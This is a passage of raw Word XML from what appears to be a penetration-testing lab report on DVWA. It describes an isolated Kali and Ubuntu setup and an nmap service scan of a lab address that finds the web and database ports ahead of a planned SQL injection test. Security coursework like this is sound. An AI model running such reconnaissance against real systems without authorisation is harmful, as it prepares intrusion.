            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> framework for making payloads and discovering secondary vulnerabilities in the lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B118CB4" w14:textId="70713E89" w:rsidR="00355E22" w:rsidRDefault="00355E22" w:rsidP="001F3A03">
      <w:bookmarkStart w:id="9" w:name="_Toc228099273"/>
    </w:p>
    <w:p w14:paraId="63C20586" w14:textId="07D423E2" w:rsidR="007806E5" w:rsidRPr="001F3A03" w:rsidRDefault="00000000" w:rsidP="001F3A03">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="66FA6DD4">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="191DDB5F" w14:textId="77777777" w:rsidR="00DA5128" w:rsidRPr="00DA5128" w:rsidRDefault="00DA5128" w:rsidP="00DA5128"/>
    <w:p w14:paraId="7AD81D58" w14:textId="6C1F1817" w:rsidR="003021A3" w:rsidRDefault="00AD0952" w:rsidP="00BF08FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc231851426"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="007D3E8B" w:rsidRPr="007D3E8B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ootprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D3E8B" w:rsidRPr="007D3E8B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidR="007D3E8B" w:rsidRPr="007D3E8B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7764C60B" w14:textId="77777777" w:rsidR="003021A3" w:rsidRDefault="003021A3" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF5C8C1" w14:textId="77777777" w:rsidR="00152D5E" w:rsidRDefault="00152D5E" w:rsidP="00152D5E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We started with two Virtual Machines which were attached to an </w:t>
      </w:r>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isolated VirtualBox NAT Network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF76AD" w14:textId="31DC9C76" w:rsidR="00152D5E" w:rsidRPr="00152D5E" w:rsidRDefault="00152D5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000174BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>The Attacker VM</w:t>
      </w:r>
      <w:r w:rsidRPr="000174BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux with tools for the test </w:t>
      </w:r>
      <w:r w:rsidR="0001557D" w:rsidRPr="0001557D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Lyon, 2009).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56BC58" w14:textId="666CD53D" w:rsidR="00152D5E" w:rsidRPr="00152D5E" w:rsidRDefault="00152D5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000174BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>The Target Node</w:t>
      </w:r>
      <w:r w:rsidRPr="000174BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="004E68D5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the Web Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. We were first required to create the environment, </w:t>
      </w:r>
      <w:r w:rsidR="004E68D5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>which lead to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
      <w:r w:rsidR="004E68D5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ation of</w:t>
      </w:r>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="001527DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>LAMP stack</w:t>
      </w:r>
      <w:r w:rsidRPr="001527DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Apache, MariaDB and PHP), before we could scan it</w:t>
      </w:r>
      <w:r w:rsidR="0089684A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089684A" w:rsidRPr="0089684A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Apache Software Foundation, 2024; MariaDB Foundation, 2024; The PHP Group, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="00152D5E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. This made the blank server a real web host for DVWA. </w:t>
      </w:r>
      <w:r w:rsidR="0089684A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EC2242" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="00D21723" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D21723">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FC6FD3B" wp14:editId="004F0374">
            <wp:extent cx="5029200" cy="658368"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="37611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15699" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="658368"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7F9B68" w14:textId="0AF6B107" w:rsidR="002B0074" w:rsidRPr="00E10611" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: LAMP Stack Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFDA505" w14:textId="5E5D36E5" w:rsidR="004F2098" w:rsidRDefault="002B0074" w:rsidP="00FB22F1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the setup was complete on both VMs, we initiated the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the process </w:t>
      </w:r>
      <w:r w:rsidR="009175CC" w:rsidRPr="009175CC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>of creating a blueprint or profile of the target's network and systems</w:t>
      </w:r>
      <w:r w:rsidR="0089684A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089684A" w:rsidRPr="0089684A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidR="009175CC" w:rsidRPr="009175CC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009175CC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008205C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="004F2098">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="008205C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">erminal, we ran the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0054137A" w:rsidRPr="00B93583">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:eastAsia="Times New Roman" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0054137A" w:rsidRPr="00B93583">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:eastAsia="Times New Roman" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="0054137A" w:rsidRPr="00B93583">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0054137A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">command to find the target IP </w:t>
      </w:r>
      <w:r w:rsidR="00FE7A56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>which was revealed to be 10.0.2.7</w:t>
      </w:r>
      <w:r w:rsidR="005040C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (R</w:t>
      </w:r>
      <w:r w:rsidR="005040C1" w:rsidRPr="007631F0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">efer to Appendix </w:t>
      </w:r>
      <w:r w:rsidR="00200CCF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="005040C1" w:rsidRPr="007631F0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> for IP discovery</w:t>
      </w:r>
      <w:r w:rsidR="005040C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000F621F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005040C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD6E5B" w14:textId="77777777" w:rsidR="004F2098" w:rsidRDefault="004F2098" w:rsidP="00FB22F1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6A21F1" w14:textId="7E2053CA" w:rsidR="005040C1" w:rsidRDefault="00D37647" w:rsidP="00FB22F1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Moving onto Active Reconnaissance, </w:t>
      </w:r>
      <w:r w:rsidR="00DA31D3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">e were successfully able to execute a scan of </w:t>
      </w:r>
      <w:r w:rsidR="00C304A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>the target IP using Kali Linux’s Nmap Tool</w:t>
      </w:r>
      <w:r w:rsidR="006E77F0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E77F0" w:rsidRPr="006E77F0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Lyon, 2009)</w:t>
      </w:r>
      <w:r w:rsidR="0024563D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C304A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CC482D" w14:textId="1DD083FD" w:rsidR="00366109" w:rsidRDefault="00C304A4" w:rsidP="00FB22F1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal here was to find out </w:t>
      </w:r>
      <w:r w:rsidR="00D85050">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>attack surface</w:t>
      </w:r>
      <w:r w:rsidR="00132AD6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00D85050">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>current versions the running services</w:t>
      </w:r>
      <w:r w:rsidR="0024563D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00366109" w:rsidRPr="00366109">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7104">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00366109" w:rsidRPr="00366109">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">canning </w:t>
      </w:r>
      <w:r w:rsidR="00864674">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00D35F61">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>completed</w:t>
      </w:r>
      <w:r w:rsidR="00864674">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00366109" w:rsidRPr="00366109">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">with the command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00366109" w:rsidRPr="00B93583">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:eastAsia="Times New Roman" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00366109" w:rsidRPr="00B93583">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:eastAsia="Times New Roman" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00366109" w:rsidRPr="00B93583">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:eastAsia="Times New Roman" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00366109" w:rsidRPr="00B93583">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:eastAsia="Times New Roman" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A 10.0.2.7</w:t>
      </w:r>
      <w:r w:rsidR="00366109" w:rsidRPr="00366109">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0431FB" w14:textId="77777777" w:rsidR="00366109" w:rsidRDefault="00366109" w:rsidP="00FB22F1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7B7539" w14:textId="39D9654B" w:rsidR="00366109" w:rsidRDefault="00C95A5A" w:rsidP="00FB22F1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The result </w:t>
      </w:r>
      <w:r w:rsidR="009C513E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>led</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the successful identification of an attack surface with two </w:t>
      </w:r>
      <w:r w:rsidR="009C513E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidR="00432FE6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s open</w:t>
      </w:r>
      <w:r w:rsidR="009C513E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30661334" w14:textId="1D4287AC" w:rsidR="00366109" w:rsidRPr="00D6413D" w:rsidRDefault="00366109">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6413D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Port 80 (Apache): Checked if a web server was running and if it could be used to run DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E5AC0E" w14:textId="27398BED" w:rsidR="00FB22F1" w:rsidRPr="00D6413D" w:rsidRDefault="00366109">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6413D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Port 3306 (MariaDB): Verified database backend is available for use in the future SQL injection test</w:t>
      </w:r>
      <w:r w:rsidR="006E77F0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E77F0" w:rsidRPr="006E77F0">
        <w:rPr>
